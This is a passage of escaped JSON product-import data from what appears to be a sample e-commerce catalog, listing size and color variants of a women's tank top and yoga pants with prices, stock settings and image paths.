Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-L-Yellow\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1762\":{\"sku\":\"WT09-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-XL-Purple\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1763\":{\"sku\":\"WT09-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-XL-White\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1764\":{\"sku\":\"WT09-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank-XL-Yellow\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"breathe-easy-tank-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1765\":{\"sku\":\"WT09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Breathe-Easy Tank\",\"description\":\"<p>The Breathe Easy Tank is so soft, lightweight, and comfortable, you won\'t even know it\'s there -- until its high-tech Cocona&reg; fabric starts wicking sweat away from your body to help you stay dry and focused. Layer it over your favorite sports bra and get moving.<\\/p>\\n<p>&bull; Machine wash\\/dry.<br \\/>&bull; Cocona&reg; fabric.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"34\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cocona&reg; performance fabric|Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=Yes,erin_recommends=Yes,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT09-XS-Purple,size=XS,color=Purple|sku=WT09-XS-White,size=XS,color=White|sku=WT09-XS-Yellow,size=XS,color=Yellow|sku=WT09-S-Purple,size=S,color=Purple|sku=WT09-S-White,size=S,color=White|sku=WT09-S-Yellow,size=S,color=Yellow|sku=WT09-M-Purple,size=M,color=Purple|sku=WT09-M-White,size=M,color=White|sku=WT09-M-Yellow,size=M,color=Yellow|sku=WT09-L-Purple,size=L,color=Purple|sku=WT09-L-White,size=L,color=White|sku=WT09-L-Yellow,size=L,color=Yellow|sku=WT09-XL-Purple,size=XL,color=Purple|sku=WT09-XL-White,size=XL,color=White|sku=WT09-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"image\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt09-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cocona&reg; performance fabric|Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"Yes\"},\"1766\":{\"sku\":\"WP01-28-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant-28-Black\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karmen-yoga-pant-28-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Black\"},\"1767\":{\"sku\":\"WP01-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant-28-Gray\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karmen-yoga-pant-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/p\\/wp01-gray_back.jpg\",\"image\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/p\\/wp01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1768\":{\"sku\":\"WP01-28-White\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant-28-White\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karmen-yoga-pant-28-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/p\\/wp01-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"White\"},\"1769\":{\"sku\":\"WP01-29-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Karmen Yoga Pant-29-Black\",\"description\":\"<p>Good for running, hiking, lounging or stretching, the Cora Parachute Pant presents comfortable styling designed to help you look and feel great.<\\/p>\\n<p>&bull; Light blue parachute pants.<br \\/>&bull; Power mesh internal waistband for support.<br \\/>&bull; Internal waistband pocket.<br \\/>&bull; Antimicrobial finish.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"karmen-yoga-pant-29-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/p\\/wp01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\